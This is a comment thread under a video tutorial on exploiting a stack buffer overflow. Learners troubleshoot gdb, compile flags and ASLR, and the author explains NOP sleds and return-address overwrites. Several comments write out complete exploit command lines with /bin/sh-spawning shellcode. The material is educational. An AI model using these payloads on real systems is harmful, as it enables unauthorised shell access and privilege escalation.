How to exploit a buffer overflow vulnerability - Practical


Comments • 262

  • @danielslater
    @danielslater  2 years ago +5

    My course "Ethical Hacking: Pentesting and Securing Web Applications" is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=NEWYEAR2022
    Sign up today for $10!

    • @khaelkugler
      @khaelkugler 9 months ago

      Or just do portswigger labs

  • @AtlasMTBRider
    @AtlasMTBRider 5 years ago +50

    To anyone getting:
    Cannot insert breakpoint 1.
    Cannot access memory at address xxxxxx
    The memory addresses displayed when you first run disassemble main are not correct.
    To get the correct ones, run the commands as follows:
    gdb ./example
    run aaaaawhatever
    disassemble main
    Now you get the correct ones; copy them and quit gdb.
    gdb ./example
    break *the address you copied
    Now running the command (run $(python ........)) will work.
    Thanks for the video :)

    • @bedoce2599
      @bedoce2599 5 years ago

      Thank you!

    • @egeyolsal2647
      @egeyolsal2647 5 years ago +1

      I love you

    • @annapooranisnoolagam
      @annapooranisnoolagam 5 years ago

      It worked. Thank you :)

    • @greycrow123
      @greycrow123 4 years ago

      Why though? Why execute run? How does it reform the address values?

    • @rohankhandelwal7681
      @rohankhandelwal7681 4 years ago

      May God increase your life by (the same address which I copied) years

  • @RealKalleAnka
    @RealKalleAnka 8 years ago +79

    I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!

    • @haransivaram1847
      @haransivaram1847 6 years ago +2

      I concur!

    • @b213videoz
      @b213videoz 4 years ago +2

      I agree, the author even managed to explain the "little endian" bit even though he said he wouldn't explain that :-)

  •  8 years ago +125

    TL;DR. Most of you will get something like "Cannot access memory at address 0x...."
    That's because you have a 64 bit system installed.
    To get this work, use the $rsp register instead of $esp.

    • @danielslater
      @danielslater  8 years ago +22

      Another way around this is to use the compiler flags I've included in the description. One of them is -m32, which compiles it as a 32-bit program.

    • @cyancoyote7366
      @cyancoyote7366 8 years ago

      I never thought I'd run into a Hungarian here, but well, there you go.

    • @douglastorrance2922
      @douglastorrance2922 8 years ago

      thx

    • @motorheadbanger90
      @motorheadbanger90 6 years ago

      Why not compile with the -m32 flag? Convert it to 32 bits.

    • @shell2673
      @shell2673 5 years ago +4

      At the end of the example I get Program received signal SIGSEGV, Segmentation Fault... how come?

  • @Arkata
    @Arkata 3 years ago +4

    Dude! Thank you!!!
    I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming.
    Thanks lots mate!!!

  • @yaseen7749
    @yaseen7749 2 years ago +1

    Thanks man, I got a reliable shellcode from your description. I was bugging my head over my shellcode not spawning a new shell. It worked like a charm with your shellcode.

  • @ayanoayumu3764
    @ayanoayumu3764 8 years ago +6

    Thank you so much man, this video saved me on a homework assignment!

  • @pberson
    @pberson 8 years ago +2

    Great job at really explaining buffer overflows and how to exploit them.

  • @Henry_the_knight
    @Henry_the_knight 1 year ago +1

    This tutorial is amazing. Thank you so much for the work you put into it

  • @annablendermann
    @annablendermann 6 years ago +1

    This really helped me understand the details of buffer overflows, thanks!

  • @pennysmith5903
    @pennysmith5903 5 years ago +5

    This might be the best tutorial ever, but I still couldn't understand my security homework.

    • @abdulmuizzkelani3760
      @abdulmuizzkelani3760 4 years ago

      I hope you have been able to figure it out 'cos I'm still struggling with mine 😊

    • @rixlayer
      @rixlayer 4 years ago +1

      Ah, finally, a comment I relate to.

    • @abdulmuizzkelani3760
      @abdulmuizzkelani3760 4 years ago +1

      @@rixlayer lol, looks like you were given an assignment on buffer overflow also

  • @srcmake
    @srcmake 5 years ago +1

    Great explanation, and concise example. Thanks.

  • @sorrefly
    @sorrefly 3 years ago +2

    You should use GDB to inspect the code and get an idea about the possible attack, but since it inserts extra variables for debugging purposes, you'll have to deal with the offset introduced.

  • @DS-mg8zx
    @DS-mg8zx 6 years ago +1

    Thank you so much for this! Practical and easy to understand.

  • @Beulzabob
    @Beulzabob 7 years ago +3

    Great explanation. Thank you for the details!

  • @cursedfox4942
    @cursedfox4942 15 days ago

    Love this. Would have loved a little more explanation on the shell code though; would have gladly watched for 30 mins.

  • @shubhamshah3023
    @shubhamshah3023 3 years ago +3

    Ran the code with the flags you mentioned in the description but still facing the same issue of cannot access memory at address. I am using Kali Linux 32-bit version in VMware. Disabled ASLR. Any solution would be highly appreciated.

  • @harbaapkabaap2040
    @harbaapkabaap2040 5 years ago +4

    You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.

  • @Darieee
    @Darieee 5 years ago

    Impressive skills.
    Thanks for the tutorial!!

  • @mikemazza404
    @mikemazza404 4 years ago +2

    Hi Daniel,
    Thank you for posting this video, this is very helpful. I do have a couple questions for you though.
    1) Have you posted the programs so that people can recreate this exercise on their own? If not, which programs are needed?
    2) Do you have another video/tutorial on how to secure against a buffer overflow exploit?
    Thanks in advance!

  • @Theraverguy
    @Theraverguy 4 years ago

    Thank you, you are a great human

  • @novanuke1356
    @novanuke1356 3 years ago

    This was great! I do have to say that the clicking was a little distracting. I guess it was a laptop? Maybe a mic off of Amazon would increase the quality of your videos.

  • @fredxu9826
    @fredxu9826 8 years ago +3

    Hello Daniel,
    Thanks for the great tutorial!
    I am new to this topic, so the question might be basic.
    I have a question regarding the shell code we want to execute in the end.
    What is '/x90' * 222?
    And after we add the shell code we want to execute, why do we add '/xd0/xce/xff/xff'?

    • @danielslater
      @danielslater  8 years ago +4

      +xu zeyuan Firstly, thanks for the compliment and I'm glad that you enjoyed it! '/x90' represents the hexadecimal encoding of the 'no operation' operation, which in security is commonly referred to as a NOP. 'x90' is a NOP in assembly and we want to place as many as we can, because if we put our shell code (code that 'pops a shell') after our NOPs, then if we start executing anywhere in our series of NOPs (commonly referred to as a nopsled) it will keep running NOPs (doing nothing) until it reaches our actual code.
      '/xd0/xce/xff/xff' refers to the memory location that we want to 'jump to' so that we can execute our code. We put it at the end as we are overwriting the stack pointer, which dictates which piece of code will be run next.
      If you want to know more I recommend my buffer overflow theory video.

    • @purnact3741
      @purnact3741 8 years ago

      I didn't understand that shellcode; how do I write it?

    • @danielslater
      @danielslater  8 years ago +1

      Shellcode isn't something that you actually have to write for yourself; it is fine to just get it from online resources. Unfortunately I don't have any videos on shellcode or any good resources I can point you to, but a brief description is just that it's machine code translated into hexadecimal, commonly with the goal of 'popping a shell', or in other words gaining the privilege level of the running program.

  • @paulifea7072
    @paulifea7072 5 years ago

    I'm in the midst of understanding buffer overflow, thank you good sir for sharing this awesome tutorial. I do have a few questions though:
    1) Is this tutorial assuming that ASLR is enabled?
    2) Also, I see a "push %ebp" instruction, followed by a "sub $0x110, %esp" instruction in your disassembled main function. Correct me if I'm wrong (my understanding of assembly code is very limited), but does that mean that the EBP gets pushed onto the stack, before the ESP shifts by 0x110 bytes (272 bytes) below the EBP register?
    3) If so, can't I just find the memory address of the buffer (p &buffer command), add 0x110 bytes + 0x4 bytes(size of EBP register) to that memory address to find the exact location of the return address, and then overwrite that return address to point to an address that's above it, ie address of buffer + 0x110 bytes + 0x4 bytes(size of EBP register) + 0x4 bytes(size of return address)?
    Once again, thank you for sharing this video! (:

  • @nutritionalyeast7978
    @nutritionalyeast7978 5 years ago +3

    Whenever I set breakpoints in gdb and run, the gdb process just quits? It says "[1]+ Stopped gdb ./[filename]" with no other errors. I've tried disabling ASLR in a number of ways so I'm not sure why this is happening

  • @wishmaster7062
    @wishmaster7062 8 years ago +1

    Hello, I have a question. In this tutorial we can observe the address of the buffer start on the stack, to which we are gonna ret from the strcpy after we overflow the stack inside that function; it is 0xffffced0, right? But isn't this address gonna be different each time? I mean the OS is placing the stack start address differently each time (or not?). So if the system placed the stack at some other address, that shellcode wouldn't work. Am I right or not? Great tutorial by the way!

    • @danielslater
      @danielslater  8 years ago +3

      Awesome question! I'm glad you asked. So there is a lot going on here, and because this is the classical hack, OSes have evolved to make it harder. The thing that you're mentioning is called ASLR (to learn more about this check out my other security video called Common Computer Security Hurdles), which works to randomise where the memory is going to occur. This means we effectively need two vulnerabilities (one that allows us to view where the memory is) to allow us to use this technique.
      ASLR isn't the only thing working against us though; this can easily be turned off, and then just from other programs executing the stack can change and the memory that is executed can change. The thing that makes this okay is that it typically doesn't move much if we do the tasks in close succession. This is also one of the key reasons why we need a NOPsled. So you are completely right that it is a problem, but it can easily be circumvented.

    • @wishmaster7062
      @wishmaster7062 8 years ago

      +Daniel Slater thanks for the answer, looking forward to your videos

  • @JosephShapiroTech
    @JosephShapiroTech 5 years ago +2

    I followed along and everything is the same for me (the addresses etc.). My output at the end even looks the same, EXCEPT that I get a segfault instead of executing bin/sh (which shows in the nonsense output similar to how the video shows). Any tips as to why this might happen? I am on an Ubuntu VM. I compile with the command shown in the description and aslr is off. Any advice is appreciated!

    • @theresa4919
      @theresa4919 5 years ago +1

      I have the same problem (just commenting to get notified about eventual answers).

    • @Hermaeus7
      @Hermaeus7 3 years ago

      Bump for the same issue. Prints out "....gibberish.../bin/sh...gibberish.." then segfaults.

  • @Lfomod1Dubstep
    @Lfomod1Dubstep 4 years ago

    Very well done, I could not get it to work (can't access the memory issue), but I took notes and learned a lot from this! Will keep on trying with other examples just to get a hands on feeling for it.

  • @purnact3741
    @purnact3741 8 years ago +2

    Bro, great one. Actually you have shown something practically done here.
    But I got some doubts.
    Firstly, I didn't properly understand the shell code concept. Where does it come from? What does it ( /x30, /x40,x50...... etc ) mean?
    Will it do the same functionality in every system (I mean any OS)? I have seen the description in the comments but didn't get it though.
    And I have a few more; I will ask them once I have watched the video again carefully.
    Thank you

    • @danielslater
      @danielslater  8 years ago +4

      Shellcode is machine code that is 'compiled' to hexadecimal, commonly with the intention of 'popping a shell', or in other words gaining the privilege level of the program.
      Where does it come from? It is written by the hacker, usually with the intention of 'popping a shell'.
      What does it ( /x30, /x40,x50...... etc ) mean? These are hexadecimal values that can be converted into processor instructions (if this doesn't make sense then do a bit of research on machine language).
      Will it do the same functionality in every system (I mean any OS)? Interesting question with an interesting answer! Machine code is instruction-set dependent and therefore depends on the architecture of the CPU. The most common types you will run into are x86 (almost every desktop and laptop) and ARM (almost everything else). So in answer to your question it depends on the CPU, not on the operating system, so if you write shellcode for a phone it most likely won't work on a computer and vice versa.
      Hopefully that clears things up a bit.

  • @vcm9837
    @vcm9837 7 years ago

    This is a really good video. Thanks for the work. One question: what is the return address? Is that the same thing as the memory address?

  • @eddiepanchlothia
    @eddiepanchlothia 7 years ago

    Good video mate.

  • @pump8686
    @pump8686 6 years ago

    Thank you for the video!

  • @luciacanonsantos5171
    @luciacanonsantos5171 4 years ago

    Very helpful!! Thanks!!

  • @calciumdd7696
    @calciumdd7696 3 years ago

    This really helps

  • @pitkes159
    @pitkes159 9 months ago +1

    Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!

  • @druqsdude
    @druqsdude 6 years ago +1

    Really helpful!!

  • @daydream1nc
    @daydream1nc 7 years ago

    Thank you so much.

  • @vitogambin3799
    @vitogambin3799 7 years ago

    Great vid, you explain very well

  • @karimbarakat7732
    @karimbarakat7732 4 years ago

    Excellent explanation, thank you. Can you advise on how you developed the machine code that you ran to get the shell to start?

    • @danielslater
      @danielslater  4 years ago

      The way that most people do it is they have a list of around 10 shellcodes for various situations, most commonly: a really short one for really small buffers, a very reliable one for when the buffer is large, and several which don't contain characters which are often escaped.
      If you still feel the need to make your own then you can write basic programs in a compiled language (I'd recommend one with few abstractions such as C), and use "objdump -d /path/to/compiled/program".

  • @mathssoso4261
    @mathssoso4261 6 years ago +3

    How did you create the pre-prepared shell code?

    • @seiv-
      @seiv- 3 years ago

      msfvenom:)

  • @leenalkaraki5652
    @leenalkaraki5652 2 years ago

    thank you so much 🤩

  • @kevin.afton_
    @kevin.afton_ 8 years ago +2

    I did everything as in the description. I have Kali Linux; I get a segfault at 260, but after feeding the payload to it I can't get a bash, just another segfault.
    Turned off ASLR, canary, stack protection.
    By the way, the +'BBBB' trick won't work for me either.
    If I do run $(python -c "print('A'*256 + 'BBBB')"), I still get 'A's:
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    If I do run $(python -c "print('A'*257 + 'BBBB')"), I get:
    Program received signal SIGSEGV, Segmentation fault.
    0x00000000 in ?? ()
    This is my payload:
    run $(python -c "print('\x90'*214 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x10\xf0\xff\xbf')")
    I even tried to increase the stack address to '\x50\xf0\xff\xbf' but still get a segfault.
    ====================
    OK, I recompiled the code on Ubuntu and I got the same results as you! :)
    I wonder what protection Kali has that Ubuntu hasn't?

    • @markrayne5382
      @markrayne5382 5 years ago

      What version of Ubuntu did you use? I'm using Ubuntu 16.04 LTS and it won't work for me; I am getting the exact same result as you did with Kali.

  • @lubangrololol2217
    @lubangrololol2217 3 years ago

    Hi, I wanted to ask if the shellcode you used is universal for every system, because I followed the tutorial exactly and in the end the random non-printable characters appeared, but I still received a segmentation fault and no shell opened.
    But maybe this has a different cause; I really just started getting in touch with these kinds of exploits.

  • @HaqAhmed
    @HaqAhmed 2 years ago

    Hi there, what if there are no call functions, but you still want to put a breakpoint under strcopy? Can you put a breakpoint on any of them, or does it have to be specifically under a call function?

  • @liszt6832
    @liszt6832 5 years ago +1

    I didn't understand why you typed in x/200xb; why 200? Could someone explain?

    • @d1rtyharry378
      @d1rtyharry378 5 years ago

      The first x means examine, the second one means hexadecimal format and b means byte.
      So basically the command says examine and print 200 memory units in hexadecimal format, each of the size of a byte.

  • @liszt6832
    @liszt6832 5 years ago +1

    What does "call" exactly mean? Calling a function we know?? But I still didn't understand what you mean.

  • @John_X_GR
    @John_X_GR 6 years ago

    Hello Daniel :) Can I ask you one thing? Why is your stack or disas main different from mine?
    Firstly, I've tried to compile with your line, both with my Ubuntu Linux and my Kali Linux, but both of them, when compiling, said different .h files were missing on each of them, for which I installed the corresponding libraries. Both of them worked fine, but both of them have a different stack or disas main from yours... why is that? I didn't try to go further from there, because I don't know assembly code and don't know any further.
    Please can you help me? Or do you know why that is, or is it natural?

    • @markrayne5382
      @markrayne5382 5 years ago

      Same here, did you fix the problem?

  • @Raj_darker
    @Raj_darker 5 years ago

    Thanks a Lot!! AweS0me Vide0

  • @am566-h7m
    @am566-h7m 7 years ago +1

    Hello, nice video. But I keep getting the error "/bin/bash: ..... : Argument list too long" "bin/bash:... : Success ". What can I do to avoid this error?

  • @moshe6501
    @moshe6501 7 years ago +1

    Using Ubuntu 64-bit... Not sure how this affects the process, but I was not able to override the address of the segmentation fault with the 'A' input...

    • @danielslater
      @danielslater  7 years ago

      Can you confirm that you compiled with the relevant flags and turned ASLR off?

    • @moshe6501
      @moshe6501 7 years ago

      It seems to do with the stack canaries state at the default compiling...

    • @danielslater
      @danielslater  7 years ago +1

      Here is the compile line from the video description
      "gcc -o example -fno-stack-protector -m32 -z execstack example.c"

    • @sanhitaguha1135
      @sanhitaguha1135 5 years ago

      @@danielslater I get the same error. I have compiled using -m32 and turned off ASLR.

    • @ExposedExpert
      @ExposedExpert 3 years ago

      @@sanhitaguha1135 Were you able to write the 'A's? As I am having issues with that.
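  The program the thread is built around (a 256-byte stack buffer filled by strcpy from argv[1], compiled with the "gcc -o example -fno-stack-protector -m32 -z execstack example.c" line above, ASLR off) is not reproduced on this page, so the following is an added example and not the video's own example.c: the unsafe copy next to a bounded replacement, with comments on which layer of protection each compile flag removes. BUF_SIZE and the function names are assumptions made for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Assumed to match the 256-byte buffer the comments keep measuring. */
#define BUF_SIZE 256

/* The pattern under discussion: strcpy copies until the source's NUL with no
 * regard for sizeof buffer. An argument longer than BUF_SIZE - 1 bytes spills
 * past the array into the saved frame pointer and return address stored above
 * it, which is what the 'A'*260 + 'BBBB' experiments in the thread are probing.
 * It is only ever called with in-bounds input in this example. */
size_t unsafe_copy(const char *input)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, input);          /* unchecked: strlen(input) + 1 bytes written */
    return strlen(buffer);
}

/* Bounded replacement: measure first, reject anything that does not fit, and
 * copy exactly len + 1 bytes so the terminator is always present. Returns the
 * number of bytes copied, or -1 with errno = E2BIG for oversized input.
 * strncpy is deliberately avoided: with a too-long source it leaves the
 * buffer unterminated, so a later strlen/printf would still read past it. */
long safe_copy(const char *input)
{
    char buffer[BUF_SIZE];
    size_t len = strlen(input);

    if (len >= sizeof buffer) {     /* need room for len bytes plus the NUL */
        errno = E2BIG;
        return -1;
    }
    memcpy(buffer, input, len + 1);
    return (long)len;
}

/* Why the compile line in the thread matters (each flag removes one layer):
 *   -fno-stack-protector  no canary, so the overflow is not reported as
 *                         "stack smashing detected" before main returns;
 *   -z execstack          stack pages are executable, so code placed in the
 *                         buffer can run (a default NX stack refuses this);
 *   ASLR off              the buffer lands at the same address on every run.
 * Those mitigations make an overflow harder to use; the length check in
 * safe_copy is what makes the overwrite impossible in the first place. */
int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    long n = safe_copy(argv[1]);
    if (n < 0) {
        fprintf(stderr, "input of %zu bytes exceeds %d-byte buffer: %s\n",
                strlen(argv[1]), BUF_SIZE - 1, strerror(errno));
        return 1;
    }
    printf("copied %ld bytes\n", n);
    return 0;
}
```

Built with the distribution defaults instead of the flags above, the unsafe version would abort with "stack smashing detected" on oversized input; the safe version rejects it regardless of how the binary was compiled.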

  • @kooners6961
    @kooners6961 2 months ago

    So I almost made it. Now it does attempt to spawn a shell, but I always end up getting a segmentation fault. I did compile it without stack protection to get it to work. For whatever reason, I can't get Linux shellcode to work or launch.

  • @miloradowicz
    @miloradowicz 6 years ago

    Can you actually execute code in the stack segment? Isn't there supposed to be a protection that separates code from data and won't allow treating the latter as the former?

  • @yan793
    @yan793 3 years ago

    Hi sir, I am following all the steps, but my computer shows me the stack smashing. Can I know why my terminal shows different things to me?

  • @RivenbladeS
    @RivenbladeS 6 years ago

    At 3:34 I have 4 bytes different and then it starts like \x41 \x41 ...
    Example: \x03 \xd1 \x00 \x21 \x41 \x41 ...
    Does this somehow affect the address 0xffffxde0? Should I subtract something?

  • @prudhviraj4358
    @prudhviraj4358 7 years ago +1

    Hey Daniel Slater!! I got the return address 0x41414141 at $(python -c"print('A'*260)") itself, but when I use $(python -c"print('A'*256+'BBBB')") I get the return address as 0x41414141. If I try with 262 or something then I am getting a constant address of 0x0804848a. Where am I going wrong? Why am I not getting 0x42424242 as the return address?

    • @danielslater
      @danielslater  7 years ago

      Two things
      1. Are you using the correct flags?
      2. If 'A'*260 returns 0x41414141 it either means there has been an extreme coincidence (that will never occur unless the program is actually designed for that to occur, but that's a discussion for another day) or 4 of your A's are already overwriting the buffer. Because of this, if you try with 262 it shouldn't work, because we know that the return address is somewhere between 0 and 260. If on 256 it still prints 0x41414141 then try 252 and move down in increments of 4 until it returns 42's.

    • @prudhviraj4358
      @prudhviraj4358 7 years ago

      Hey Daniel Slater, I used all the flags and also disabled ASLR. I have found that my return address is 4 bytes and located at the (112th, 111th, 110th, 109th) positions. I have concluded this by using the command run $(python -c"print('C'*111+'A'*20+'B'*129). When I run this I get the error saying 0x41434343. Now how should I proceed further with this information?

    • @prudhviraj4358
      @prudhviraj4358 7 years ago

      i then used this command run $(python -c "print('\x90'*108+'\x00\xcf\xff\xff'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*102)") and then it says process exited normally, but there is no root shell grant. where am i going wrong?

    • @danielslater
      @danielslater  7 years ago

      Look at my off-by-one video and hopefully you'll learn what happened then. The buffer is definitely not at 109 given that the buffer is 256 bytes long. Unless there is a bug in the C compiler (that is triggered by basic problems), you're overwriting part of the return address but not the full thing.

    • @prudhvi5313
      @prudhvi5313 7 years ago

      Daniel Slater, I was successful in accessing the bin/sh... the above print command with the shell code works!!! Thank you so much dude!!! This is the best tutorial ever

  • @anuraagsinha9447
    @anuraagsinha9447 7 years ago

    You need to compile this with debugging options, correct? On any system you're trying to hack they obviously aren't going to give that to you, so do people just use trial and error in order to find their memory locations?

  • @문예진-b7x
    @문예진-b7x 4 years ago

    In the end I get 'program received signal SIGILL, Illegal instruction'. I don't know what the problem is...

  • @kooners6961
    @kooners6961 2 months ago

    The error says cannot insert breakpoint 1 and cannot access memory at address: (address name)

  • @starmon00
    @starmon00 8 years ago +2

    Great video, except one question. Why was your entire overflow 272 bytes.
    We know the allocated buffer is 256 + 4 for ebp + 4 for ret, so where did the extra 8 bytes come from?

    • @danielslater
      @danielslater  8 years ago +3

      There are a couple of potential things it could have come from, most likely of which is that padding is added for optimisation purposes. As my computer is 64bit (yes I know the program was compiled as 32bit and all operations are executed as though it is 32bit) the stack frame will behave the same as though it is 64bit (note that there are certain instances where this isn't the case.) The stack frame is going to add four bytes of padding as the CPU instruction set is set up for accessing things from the start of the stack frame and manipulations to work on 'misaligned memory' involves more clock cycles. What this basically means is 4 byte variables will 'take up' the width of the stack frame (but only the amount allocated is accessible.)
      Note that it is possible to override this optimisation with compiler flags which might be useful if memory on the device was restricted.

    • @danielslater
      @danielslater  8 years ago +5

      Oh sorry, just realised I didn't explicitly answer the question after that explanation! Because of that it is likely that ebp and ret each take up 8 bytes, totalling 16, so it adds up.
      If you want to learn more about memory management and padding I'd recommend playing around in GDB. You can quite easily write some programs that do basic things and then just use GDB and the examine function (demonstrated in this video) to see exactly what is happening. A word of caution though: look at what optimisation flags, if any, are set and see what difference that makes.

  • @muhitmustakim9399
    @muhitmustakim9399 6 years ago +1

    Hi Daniel, thanks for the nice video.
    When I run from gdb I get the message below:
    process 5989 is executing new program: /bin/dash
    Warning:
    Cannot insert breakpoint 1.
    Cannot access memory at address 0x8048471
    When running the executable I get the error below:
    �����/bin/sh����
    Segmentation fault (core dumped)
    Any idea why?

  • @markrayne5382
    @markrayne5382 5 years ago

    Hi Daniel, first off great tutorial :)
    I seem to be getting an error like most people on here; like another user, prud, says:
    "! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141." This exact thing is happening to me. I went down in multiples of 4, but when I did I got no seg fault; the seg fault only occurs when the total value is 260.
    Any idea why?
    Thanks (note my ASLR and stack protector are turned off)

  • @kooners6961
    @kooners6961 2 months ago

    At the end it spawns, then says inferior 1 and exits normally.

  • @jaeun91
    @jaeun91 6 years ago

    When I try to find the size of the buffer, I get Program received signal SIGSEGV, Segmentation fault.
    _IO_fgets (buf=0xbfffe847 "", n=9, fp=0x0) at iofgets.c:50
    50 iofgets.c: No such file or directory.
    What am I doing wrong?

  • @Makingfinancialdecisions
    @Makingfinancialdecisions 2 years ago

    I am new to these concepts and this process. With that being said, is this the command prompt for Ubuntu?

  • @eliddell1
    @eliddell1 6 years ago

    Late to the game here, but I am not getting a shell and can't understand why my output shows //shh/bin instead of /bin/sh. Can you help?

  • @aneelasafdar7278
    @aneelasafdar7278 6 years ago

    I use \x90 with the assumption that it will be stored as a single byte in memory, but it isn't. It gets stored as is, with hex values 3039785c. Even a file storing this input or shell code also takes more memory than the exact number of bytes in it. I am on a 64-bit machine and compiling the program using -m32.

    • @danielslater
      @danielslater  6 years ago

      I've addressed this in other comments, but you have to think about how memory is stored in C. The short explanation is that padding is added to memory to make it more efficient to access.

  • @eliddell1
    @eliddell1 6 years ago +5

    Can you explain how to write the shell code?

  • @JohnnyDepp-zu1if
    @JohnnyDepp-zu1if 1 year ago

    Is there a course on Udemy, or one that you know of, that can teach me more about this in depth? What is this called, buffer overflow exploitation?

  • @pberson
    @pberson 8 years ago +1

    I can not get the shell to pop at the end.
    I wonder is it this:
    (gdb) run $(python -c "print('A'*260)")
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260)")
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) run $(python -c "print('A'*260+'BBBB')")
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260+'BBBB')")
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
    Program received signal SIGSEGV, Segmentation fault.
    0x0804848a in main ()
    I do not get 0x42424242 in ?? () I think this is my problem.

    • @lonewanderer1776
      @lonewanderer1776 8 years ago

      same

    • @lonewanderer1776
      @lonewanderer1776 8 years ago

      Something to do with the OS; are you using Debian or Ubuntu?

    • @pberson
      @pberson 8 years ago

      I am using Ubuntu 16.02

    • @danielslater
      @danielslater  8 years ago

      What compiler settings are you using? If you don't use the proper compiler settings and turn ASLR off then it won't work.

    • @pberson
      @pberson 8 years ago

      Tested with both the correct compiler settings and ASLR off

  • @theone4808
    @theone4808 2 years ago

    Nice

  • @johnmwansa4180
    @johnmwansa4180 7 years ago

    I like your video

  • @RivenbladeS
    @RivenbladeS 6 years ago

    At 6:37, how do I make my injection program compile to hex bytes?

  • @user-yn4nj2ik9h
    @user-yn4nj2ik9h 3 years ago

    What should I do if my esp starts in the middle of an address and not at the start of the line?

  • @himiker
    @himiker 5 years ago

    Everything seems to work, except at the end, the "/bin/sh" program isn't run. I get the following instead:
    Program received signal SIGILL, Illegal instruction.
    0xb7e30a00 in __libc_start_main (main=0x804844d , argc=3,
    argv=0xbffff0a4, init=0x8048490 ,
    fini=0x8048500 , rtld_fini=0xb7fed180 ,
    stack_end=0xbffff09c) at libc-start.c:246
    246 libc-start.c: No such file or directory.
    I also get this message when looking for the edge of the buffer: run $(python -c "print('A'*268 )")
    I know this is an old post, but if anyone has any ideas, I would greatly appreciate it.

  • @annoymousko288
    @annoymousko288 2 years ago

    In the end why is it showing random characters?

  • @melledijkstra5543
    @melledijkstra5543 7 years ago

    What if the stored input is much smaller, like $(python -c "print('A'*28+'BBBB')")? The shellcode is 46 bytes. He subtracts it from the 268 (in my case 28). That doesn't fit, right?

    • @danielslater
      @danielslater  7 years ago

      Yeah, that doesn't fit. In reality you need a pretty large buffer, because without a NOP sled you'll need either a lot of luck or a lot of attempts to actually get the right starting address.

    • @melledijkstra5543
      @melledijkstra5543 7 years ago

      Daniel Slater Or maybe I need smaller shellcode? I don't need to get a shell though, just the contents of a file which I can't access (for a challenge, just to be clear). This should be possible with smaller shellcode, I guess. But I'll need to write that myself somehow. Do you have any tuts on how to do that? Thx for the video!

    • @danielslater
      @danielslater  7 years ago +1

      It's probably worth going into how to write shellcode. I don't have any videos on it, but it shouldn't be too hard to find.
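    The pattern this thread is debugging, a strcpy into a fixed stack buffer, beside a bounds-checked form, as an added example that is not the video's example.c (its source is not in the thread); the 256-byte buffer size is an assumption chosen to be consistent with the 268 bytes measured to the saved return address.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example, not the video's example.c. BUF_SIZE is an assumption:
 * 256 bytes of buffer plus alignment padding and the saved EBP matches the
 * 268-byte distance to the return address measured in the thread. */
#define BUF_SIZE 256

/* Vulnerable pattern: strcpy copies until the NUL terminator regardless of the
 * destination size, so an argument longer than BUF_SIZE-1 bytes runs past the
 * buffer into the saved frame pointer and return address (the 0x42424242 crash). */
void vulnerable_copy(const char *input) {
    char buffer[BUF_SIZE];
    strcpy(buffer, input);
    puts(buffer);
}

/* Hardened form: refuse input that does not fit (counting the NUL), then copy
 * with an explicit length. Returns 0 on success, -1 when the input is rejected. */
int safe_copy(char *dst, size_t dst_size, const char *input) {
    size_t len = strlen(input);
    if (dst_size == 0 || len >= dst_size) {
        return -1;
    }
    memcpy(dst, input, len + 1);
    return 0;
}

/* Same frame layout as vulnerable_copy, but the copy is bounded. */
int try_safe_copy(const char *input) {
    char buffer[BUF_SIZE];
    if (safe_copy(buffer, sizeof buffer, input) != 0) {
        return -1;
    }
    puts(buffer);
    return 0;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (try_safe_copy(argv[1]) != 0) {
        fprintf(stderr, "rejected: %zu bytes do not fit a %d-byte buffer\n",
                strlen(argv[1]), BUF_SIZE);
        return 1;
    }
    return 0;
}
```

    Run it with the same $(python -c "print('A'*268)") argument the thread uses: the hardened copy rejects it instead of overwriting the return address.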

  • @thomasathanasiou1661
